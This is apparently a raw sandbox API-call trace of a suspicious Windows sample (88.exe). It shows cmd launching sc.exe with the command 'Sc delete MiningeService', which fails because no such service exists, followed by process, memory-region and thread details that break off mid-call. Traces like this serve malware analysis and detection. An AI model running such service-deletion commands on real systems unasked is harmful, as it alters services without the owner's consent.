(_String1="Sc", _String2="SETLOCAL") returned -2 [0271.786] _wcsicmp (_String1="Sc", _String2="ENDLOCAL") returned 14 [0271.786] _wcsicmp (_String1="Sc", _String2="TITLE") returned -1 [0271.786] _wcsicmp (_String1="Sc", _String2="START") returned -17 [0271.786] _wcsicmp (_String1="Sc", _String2="DPATH") returned 15 [0271.786] _wcsicmp (_String1="Sc", _String2="KEYS") returned 8 [0271.787] _wcsicmp (_String1="Sc", _String2="MOVE") returned 6 [0271.787] _wcsicmp (_String1="Sc", _String2="PUSHD") returned 3 [0271.787] _wcsicmp (_String1="Sc", _String2="POPD") returned 3 [0271.787] _wcsicmp (_String1="Sc", _String2="ASSOC") returned 18 [0271.787] _wcsicmp (_String1="Sc", _String2="FTYPE") returned 13 [0271.787] _wcsicmp (_String1="Sc", _String2="BREAK") returned 17 [0271.787] _wcsicmp (_String1="Sc", _String2="COLOR") returned 16 [0271.787] _wcsicmp (_String1="Sc", _String2="MKLINK") returned 6 [0271.787] _wcsicmp (_String1="Sc", _String2="FOR") returned 13 [0271.787] _wcsicmp (_String1="Sc", _String2="IF") returned 10 [0271.787] _wcsicmp (_String1="Sc", _String2="REM") returned 1 [0271.787] GetProcessHeap () returned 0x620000 [0271.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x633140 [0271.787] GetProcessHeap () returned 0x620000 [0271.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x633358 [0271.787] _wcsnicmp (_String1="Sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0271.787] GetProcessHeap () returned 0x620000 [0271.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x418) returned 0x6207f0 [0271.788] SetErrorMode (uMode=0x0) returned 0x8001 [0271.788] SetErrorMode (uMode=0x1) returned 0x0 [0271.788] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6207f8, lpFilePart=0x3bf400 | out: lpBuffer="C:\\Windows", lpFilePart=0x3bf400*="Windows") returned 0xa [0271.788] SetErrorMode (uMode=0x8001) returned 0x1 [0271.788] GetProcessHeap () returned 0x620000 [0271.788] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6207f0, Size=0x24) returned 0x6207f0 [0271.788] GetProcessHeap () returned 0x620000 [0271.788] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6207f0) returned 0x24 [0271.788] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x8f [0271.788] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0271.788] GetProcessHeap () returned 0x620000 [0271.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x142) returned 0x6333a0 [0271.788] GetProcessHeap () returned 0x620000 [0271.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x27c) returned 0x620820 [0271.800] GetProcessHeap () returned 0x620000 [0271.800] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x620820, Size=0x144) returned 0x620820 [0271.800] GetProcessHeap () returned 0x620000 [0271.800] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x620820) returned 0x144 [0271.800] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0271.800] GetProcessHeap () returned 0x620000 [0271.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe0) returned 0x6334f0 [0271.801] GetProcessHeap () returned 0x620000 [0271.801] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6334f0, Size=0x76) returned 0x6334f0 [0271.801] GetProcessHeap () returned 0x620000 [0271.801] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6334f0) returned 0x76 [0271.802] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0271.803] FindFirstFileExW (in: lpFileName="C:\\Windows\\Sc.*", fInfoLevelId=0x1, lpFindFileData=0x3bf17c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bf17c) returned 0xffffffff [0271.803] GetLastError () returned 0x2 [0271.804] FindFirstFileExW (in: lpFileName="C:\\Windows\\Sc", fInfoLevelId=0x1, lpFindFileData=0x3bf17c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bf17c) returned 0xffffffff [0271.804] GetLastError () returned 0x2 [0271.804] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0271.804] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\Sc.*", fInfoLevelId=0x1, lpFindFileData=0x3bf17c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bf17c) returned 0x633570 [0271.805] GetProcessHeap () returned 0x620000 [0271.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x6335b0 [0271.805] FindClose (in: hFindFile=0x633570 | out: hFindFile=0x633570) returned 1 [0271.805] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x3bf17c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bf17c) returned 0xffffffff [0271.851] GetLastError () returned 0x2 [0271.852] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bf17c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bf17c) returned 0x633570 [0271.853] GetProcessHeap () returned 0x620000 [0271.853] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6335b0, Size=0x4) returned 0x6335b0 [0271.853] FindClose (in: hFindFile=0x633570 | out: hFindFile=0x633570) returned 1 [0271.853] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0271.853] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0271.853] GetConsoleTitleW (in: lpConsoleTitle=0x3bf674, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0271.853] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bf4fc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3bf5c4 | out: lpAttributeList=0x3bf4fc, lpSize=0x3bf5c4) returned 1 [0271.853] UpdateProcThreadAttribute (in: lpAttributeList=0x3bf4fc, dwFlags=0x0, Attribute=0x60001, lpValue=0x3bf5bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bf4fc, lpPreviousValue=0x0) returned 1 [0271.853] GetStartupInfoW (in: lpStartupInfo=0x3bf4b8 | out: lpStartupInfo=0x3bf4b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20c, hStdOutput=0x214, hStdError=0x214)) [0271.854] GetProcessHeap () returned 0x620000 [0271.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x633570 [0271.854] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0271.854] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0271.854] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0271.854] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0271.854] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0271.854] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0271.855] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0271.856] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0271.856] GetProcessHeap () returned 0x620000 [0271.856] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633570 | out: hHeap=0x620000) returned 1 [0271.856] GetProcessHeap () returned 0x620000 [0271.856] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa) returned 0x630050 [0271.856] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0271.860] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="Sc delete MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x3bf558*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="Sc delete MiningeService", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3bf5a4 | out: lpCommandLine="Sc delete MiningeService", lpProcessInformation=0x3bf5a4*(hProcess=0x84, hThread=0x80, dwProcessId=0xa08, dwThreadId=0xa0c)) returned 1 [0271.872] CloseHandle (hObject=0x80) returned 1 [0271.872] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0271.872] GetProcessHeap () returned 0x620000 [0271.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634d80 | out: hHeap=0x620000) returned 1 [0271.872] GetEnvironmentStringsW () returned 0x634230* [0271.872] GetProcessHeap () returned 0x620000 [0271.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb44) returned 0x634d80 [0271.872] FreeEnvironmentStringsW (penv=0x634230) returned 1 [0271.873] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0272.517] GetExitCodeProcess (in: hProcess=0x84, lpExitCode=0x3bf498 | out: lpExitCode=0x3bf498*=0x424) returned 1 [0272.517] CloseHandle (hObject=0x84) returned 1 [0272.517] _vsnwprintf (in: _Buffer=0x3bf5e0, _BufferCount=0x13, _Format="%08X", _ArgList=0x3bf4a4 | out: _Buffer="00000424") returned 8 [0272.517] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0272.518] GetProcessHeap () returned 0x620000 [0272.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x634d80 | out: hHeap=0x620000) returned 1 [0272.518] GetEnvironmentStringsW () returned 0x634230* [0272.518] GetProcessHeap () returned 0x620000 [0272.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb6a) returned 0x638448 [0272.518] FreeEnvironmentStringsW (penv=0x634230) returned 1 [0272.518] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0272.518] GetProcessHeap () returned 0x620000 [0272.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638448 | out: hHeap=0x620000) returned 1 [0272.519] GetEnvironmentStringsW () returned 0x634230* [0272.519] GetProcessHeap () returned 0x620000 [0272.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb6a) returned 0x638448 [0272.519] FreeEnvironmentStringsW (penv=0x634230) returned 1 [0272.519] GetProcessHeap () returned 0x620000 [0272.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x630050 | out: hHeap=0x620000) returned 1 [0272.519] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bf4fc | out: lpAttributeList=0x3bf4fc) [0272.519] _get_osfhandle (_FileHandle=1) returned 0x214 [0272.519] SetConsoleMode (hConsoleHandle=0x214, dwMode=0x0) returned 0 [0272.519] _get_osfhandle (_FileHandle=1) returned 0x214 [0272.519] GetConsoleMode (in: hConsoleHandle=0x214, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0272.519] _get_osfhandle (_FileHandle=0) returned 0x20c [0272.519] GetConsoleMode (in: hConsoleHandle=0x20c, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 0 [0272.520] GetConsoleOutputCP () returned 0x1b5 [0272.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0272.520] SetThreadUILanguage (LangId=0x0) returned 0x409 [0272.520] exit (_Code=1060) Process: id = "25" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x1903d000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x8f0" cmd_line = "Sc delete MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5797 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5798 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5799 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5800 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5801 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5802 start_va = 0x1d0000 end_va = 0x1dbfff monitored = 1 entry_point = 0x1d7997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 5803 start_va = 0x230000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 5804 start_va = 0x2a0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5805 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5806 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5807 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5808 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5809 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5810 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5811 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5812 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5813 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5814 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5815 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5816 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5817 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5818 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5819 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5820 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5821 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5822 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5823 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5824 start_va = 0x480000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5825 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5826 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5827 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5828 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5829 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5830 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5831 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5832 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5833 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5834 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5835 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5836 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5837 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5838 start_va = 0xe0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5839 start_va = 0x2e0000 end_va = 0x39ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5840 start_va = 0x30000 end_va = 0x3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 222 os_tid = 0xa0c [0272.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df9e4 | out: lpSystemTimeAsFileTime=0x2df9e4*(dwLowDateTime=0xc90c4d80, dwHighDateTime=0x1d7fb6e)) [0272.213] GetCurrentProcessId () returned 0xa08 [0272.213] GetCurrentThreadId () returned 0xa0c [0272.213] GetTickCount () returned 0x1d61134 [0272.213] QueryPerformanceCounter (in: lpPerformanceCount=0x2df9dc | out: lpPerformanceCount=0x2df9dc*=3099842007490) returned 1 [0272.215] GetModuleHandleA (lpModuleName=0x0) returned 0x1d0000 [0272.215] __set_app_type (_Type=0x1) [0272.215] __p__fmode () returned 0x76d631f4 [0272.215] __p__commode () returned 0x76d631fc [0272.215] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1d79c7) returned 0x0 [0272.216] __wgetmainargs (in: _Argc=0x1d9020, _Argv=0x1d9028, _Env=0x1d9024, _DoWildCard=0, _StartInfo=0x1d9034 | out: _Argc=0x1d9020, _Argv=0x1d9028, _Env=0x1d9024) returned 0 [0272.216] SetThreadUILanguage (LangId=0x0) returned 0x409 [0272.220] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0272.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x214 [0272.220] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0272.220] _wcsicmp (_String1="delete", _String2="query") returned -13 [0272.220] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0272.220] _wcsicmp (_String1="delete", _String2="start") returned -15 [0272.220] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0272.220] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0272.220] _wcsicmp (_String1="delete", _String2="control") returned 1 [0272.220] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0272.220] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0272.220] _wcsicmp (_String1="delete", _String2="config") returned 1 [0272.220] _wcsicmp (_String1="delete", _String2="description") returned -7 [0272.220] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0272.220] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0272.220] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0272.220] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0272.220] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0272.221] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0272.221] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0272.221] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0272.221] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0272.221] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0272.221] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5af7c8 [0272.224] OpenServiceW (hSCManager=0x5af7c8, lpServiceName="MiningeService", dwDesiredAccess=0x10000) returned 0x0 [0272.224] GetLastError () returned 0x424 [0272.224] _itow (in: _Dest=0x424, _Radix=3012852 | out: _Dest=0x424) returned="1060" [0272.224] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, 